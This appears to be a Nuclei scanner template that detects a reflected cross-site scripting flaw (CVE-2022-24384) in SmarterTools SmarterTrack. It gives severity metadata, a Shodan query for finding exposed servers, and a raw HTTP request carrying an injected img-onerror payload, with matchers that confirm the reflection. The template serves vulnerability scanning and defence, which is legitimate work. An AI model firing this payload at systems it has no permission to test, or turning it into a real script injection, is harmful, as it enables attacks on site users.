38 lines
1.1 KiB
YAML
38 lines
1.1 KiB
YAML
id: CVE-2022-24384
|
|
|
|
info:
|
|
name: SmarterTools SmarterTrack - Cross-Site Scripting
|
|
author: E1A
|
|
severity: medium
|
|
description: |
|
|
Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010.
|
|
reference:
|
|
- https://csirt.divd.nl/CVE-2022-24384
|
|
- https://csirt.divd.nl/DIVD-2021-00029
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-24384
|
|
cwe-id: CWE-79
|
|
cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:*
|
|
epss-score: 0.00079
|
|
metadata:
|
|
max-request: 1
|
|
product: smartertrack
|
|
shodan-query: http.favicon.hash:1410071322
|
|
vendor: smartertools
|
|
verified: true
|
|
tags: cve,cve2022,xss,smartertrack
|
|
|
|
http:
|
|
- raw:
|
|
- |+
|
|
GET /Main/Default.aspx?viewSurveyError=Unknown+survey"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '"type":"error","text":"Unknown survey\"><img src=x onerror=alert(document.domain)>"'
|
|
- 'smartertrack'
|
|
condition: and |